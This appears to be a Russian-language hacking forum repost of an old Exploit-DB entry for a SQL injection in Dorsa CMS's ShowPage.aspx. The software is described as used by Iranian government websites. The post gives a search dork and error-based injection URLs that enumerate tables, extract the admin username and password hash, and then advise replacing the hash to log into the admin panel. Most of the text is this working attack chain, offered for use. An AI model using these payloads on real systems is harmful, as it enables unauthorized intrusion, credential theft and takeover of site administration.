Exploit DorsaCMS - 'ShowPage.aspx' SQL Injection

Exploiter

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
6810
Проверка EDB
  1. Пройдено
Автор
SYST3M_F4ULT
Тип уязвимости
WEBAPPS
Платформа
ASP
CVE
null
Дата публикации
2008-10-22
Код: 
#########################################################
---------------------------------------------------------

Portal Name: Dorsa CMS
Vendor : http://www.dorsacms.com
Description : A CMS written by iranian programmers which uses by governmental websites.
Vulnerable File : ShowPage.aspx
Dork: Powered by DorsaCms
Author : syst3m_f4ult  && Y!ID : autumn_love6

---------------------------------------------------------
#########################################################

How to exploit :

a live example :

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2

Testing injection :
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,@@version)--
	Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Enterprise ...

Getting table which contains Username and Password:
Easiest way is to search it:

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27))--

	table_name = Seller
Its not that table we are seeking, so we keep on:
http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 table_name from information_schema.columns where column_name like %27%pass%%27 and table_name not in ('Seller')))--

Bingo
	Table_name = USER_

Start to get username and pass from USER_:

http://www.xxx.ir/ShowPage.aspx?page_=news&lang=1&tempname=fire&sub=0&PageID=36&PageIDF=2 or 1=convert(int,(select top 1 %2b'Username= '%2bconvert(varchar,isnull(convert(varchar,user_name),'NULL'))%2b' -- Password= : '%2bconvert(varchar,isnull(convert(varchar,Pass),'NULL')) from USER_ where Code='1'))

	user : admin
	pass : kaBY/8jRC+XbjSIIDhsHFmOX1B2pDd

Update hash to a hash you know its decode and enjoy.

login to portal :
http://www.xxx.ir/Dorsapax/Signin.aspx


---------------------------------------------------------
#########################################################

# milw0rm.com [2008-10-22]
 
Источник
www.exploit-db.com
Войдите или зарегистрируйтесь для ответа.

Похожие темы

Exploiter
Exploit InstantASP 4.1 - 'Members1.aspx' Multiple Cross-Site Scripting Vulnerabilities
Ответы
0
Просмотры
399
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Dorsa CMS - 'Default_.aspx' Cross-Site Scripting
Ответы
0
Просмотры
341
Эксплойты & Уязвимости
Exploiter
Exploiter
Exploiter
Exploit Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service
Ответы
0
Просмотры
295
Эксплойты & Уязвимости
Exploiter
Exploiter
Сверху Снизу